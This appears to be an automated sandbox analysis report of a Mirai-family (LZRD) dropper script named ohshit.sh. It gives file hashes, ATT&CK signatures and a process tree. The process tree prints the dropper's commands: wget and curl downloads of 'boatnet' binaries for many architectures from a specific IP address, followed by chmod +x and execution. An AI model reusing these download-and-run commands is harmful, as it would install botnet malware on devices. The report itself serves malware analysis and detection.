Analysis
-
max time kernel
149s -
max time network
137s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
-
submitted
13-01-2025 07:07
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
507f90eff6a55518aa1676f3143e05f7
-
SHA1
743754532ab2a508ec40f929be7677af00028f96
-
SHA256
2041eb52226fb9761127154efeaeac2d979cdab0acf2cbe6d85ae49f679d6afe
-
SHA512
33b6bbe8a574ecf641282cdad54df167f589c519ab623570027ef16d96dcc9405b2882624b0c9a35db87b12f562c9bc9b344a367ed19fc53bd6d4e326df055c9
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 15 IoCs
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Writes file to system bin folder 2 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Reads runtime system information 41 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.x862⤵
-
-
/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-MHfeEt WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-MHfeEt WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.arc2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-MHfeEt WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.i4682⤵
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.i4682⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-MHfeEt WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.i6862⤵
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.i6862⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-MHfeEt WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.x86_642⤵
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.x86_642⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-MHfeEt WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.mpsl2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-MHfeEt WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.arm2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-MHfeEt WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.arm52⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-MHfeEt WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.arm62⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-MHfeEt WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.arm72⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.ppc2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.spc2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.m68k2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://216.9.225.175/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://216.9.225.175/hiddenbin/boatnet.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.sh42⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD5eb27ffa35ae33dc6cafa6a0aab739e07
SHA1e85f03dd6f3850d98857ef1df900e05022723d91
SHA2568724343245c1e43f3ea1d6e04f75259b4de07f96de3fe3d3d2afb28951c3c994
SHA512574212fbdff518187ff22f721d96cebed694a1b78cac2c86907a6b62f6f46390c5cf54a37ba2725ef38155d40621d0d1b36da74560834d5aaa180f9ec221ed2a
-
Filesize
105KB
MD53e2598db7eb7710dc93c7bb802807897
SHA1fc2c132f48af7936af17fb98460d8d88b0338a27
SHA256a70a6f13a9e37d0b4a025c2c7b15690c2bb3f5dffb2243d68ce66d9e3ec7e1a1
SHA512b5349bc0cb8ce652b1b9c02e08fefc75875a624f3a347f7c050f54613fd8e5662e8e3f0f1dfcb94f02a9261939475d3c29c760d446e1a4e7af8bfc577aaf18b1
-
Filesize
220B
MD5f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1750274b02d5f5b00026a4f55b020f4285c693533
SHA256219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA51236bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259
-
Filesize
220B
MD5a8f502a6fb3b7b940e922c951d9e493a
SHA1fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338
-
Filesize
53KB
MD573034e22df67a48dd36182e2d761d4a8
SHA1fe5e88b6b766da91a9c8899d6f7cd57b4dbddb71
SHA2562670ae2b5caeb6f4a07f19aeb74e3e95f4392abba60a8e91cf9ba2f5ec50b653
SHA512d4fe323678142abbb8d36eeb6053b0cee9a95dfdba1f33eec05ceec3b255e7e12773120f117887c3c4a08e40d14eb40e2e0d7f242d515d3936a3f77c6d4c903c
-
Filesize
19KB
MD59fdbc0d52615f951689fdf0a992b1cc0
SHA1a3886419c9b8d1d69f933d091f86cb55acfbc1bc
SHA2562e6398da57aae86ced253d9411da2f41f9446ba35adcf2870cd4f219368f8212
SHA512d06e8220cef72a182ee6b1af292c1954b3eca0f127e206ea47c902c813157a4429a1ab47e6caf5604a29e5e38124b274648d4fd31c1ed85ca933ccd1f9611e9e